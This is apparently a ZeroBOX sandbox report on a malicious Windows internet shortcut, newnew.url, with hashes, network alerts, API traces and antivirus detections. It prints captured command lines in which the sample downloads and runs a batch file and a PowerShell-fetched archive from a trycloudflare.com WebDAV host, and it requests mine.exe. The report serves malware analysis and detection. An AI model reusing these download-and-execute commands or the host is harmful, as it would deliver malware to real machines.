Summary | ZeroBOX

newnew.url

Generic Malware Antivirus AntiDebug MSOffice File AntiVM URL Format
Category Machine Started Completed
FILE s1_win7_x6401 April 2, 2025, 10:02 a.m. April 2, 2025, 10:06 a.m.
Size 170.0B
Type MS Windows 95 Internet shortcut text (URL=<file://hot-browser-luke-granted.trycloudflare.com/DavWWWRoot/rename.lnk>), ASCII text, with CRLF line terminators
MD5 53af7ebed1ba61fb8f303affcba618c7
SHA256 354629a8ae9015c45cadcec9372bc3722ad661c349964deaf9248bbe34087bd2
CRC32 D9B19624
ssdeep 3:HRAbABGQYmhKR6dXFfyV61G69ALJMBHKs7V25YdimVVG/VClAWHyn:HRYFVmhKIdhyAyJMQs7A54vVG/4xHy
Yara
  • url_file_format - Microsoft Windows Internet Shortcut File Format

IP Address Status Action
104.16.230.132 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49182 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.101:49182 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.101:49182 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.101:49181 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.101:49181 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.101:49181 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 104.16.230.132:80 -> 192.168.56.101:49164 2049438 ET HUNTING Successful PROPFIND Response for Application Media Type Misc activity
TCP 104.16.230.132:80 -> 192.168.56.101:49164 2049438 ET HUNTING Successful PROPFIND Response for Application Media Type Misc activity
TCP 104.16.230.132:80 -> 192.168.56.101:49164 2048508 ET INFO LNK File Downloaded via HTTP Misc activity
TCP 104.16.230.132:80 -> 192.168.56.101:49164 2049438 ET HUNTING Successful PROPFIND Response for Application Media Type Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.101:49182 -> 104.16.230.132:443 | Issuer: C=US, O=Google Trust Services, CN=WR1 | Subject: CN=trycloudflare.com | Fingerprint: c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49181 -> 104.16.230.132:443 | Issuer: C=US, O=Google Trust Services, CN=WR1 | Subject: CN=trycloudflare.com | Fingerprint: c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1 192.168.56.101:49175 -> 104.16.230.132:443 | Issuer: C=US, O=Google Trust Services, CN=WR1 | Subject: CN=trycloudflare.com | Fingerprint: c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Opening PDF file...
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: The system cannot find the path specified.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: Adding C:\Users\test22\Music\yes.bat
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: ERROR:
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: Invalid syntax. Default option is not allowed more than '1' time(s). Type "TIMEOUT /?" for usage.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000306e80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7500b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7500b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7503c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7503c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7503c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000379e00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000379e00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000379e00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea890
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea890
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77cb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77cb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77cb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77cb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77d760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77d760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77da70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77da70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b786b90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b786b90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b786b90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b786b90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77d530
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77d530
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000004a1c70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5eb2d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request OPTIONS http://hot-browser-luke-granted.trycloudflare.com/
request PROPFIND http://hot-browser-luke-granted.trycloudflare.com/
request PROPFIND http://hot-browser-luke-granted.trycloudflare.com/rename.lnk
request GET http://hot-browser-luke-granted.trycloudflare.com/rename.lnk
request PROPFIND http://hot-browser-luke-granted.trycloudflare.com/desktop.ini
request GET http://hot-browser-luke-granted.trycloudflare.com/desktop.ini
request GET https://hot-browser-luke-granted.trycloudflare.com/mine.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2620
region_size: 12849152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002bb0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000037f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2620
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000031f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000005b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000037f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 11603968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002df0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file UNC\hot-browser-luke-granted.trycloudflare.com\DavWWWRoot\rename.lnk
cmdline powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://hot-browser-luke-granted.trycloudflare.com/python.zip' -OutFile 'C:\Users\test22\Downloads\python.zip' }"
cmdline "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat
cmdline powershell -Command "& { Expand-Archive -Path 'C:\Users\test22\Downloads\python.zip' -DestinationPath 'C:\Users\test22\Downloads' -Force }"
ESET-NOD32 LNK/Agent.CH
Kaspersky HEUR:Trojan.WinINF.Agent.gen
BitDefender Gen:Variant.UrlDownloader.13
NANO-Antivirus Trojan.Inf.Downloader.ezohxo
MicroWorld-eScan Gen:Variant.UrlDownloader.13
VIPRE Gen:Variant.UrlDownloader.13
FireEye Gen:Variant.UrlDownloader.13
GData Gen:Variant.UrlDownloader.13
Time & API Arguments Status Return Repeated

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:148 CREDAT:145409
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2620 CREDAT:145409
cmdline C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
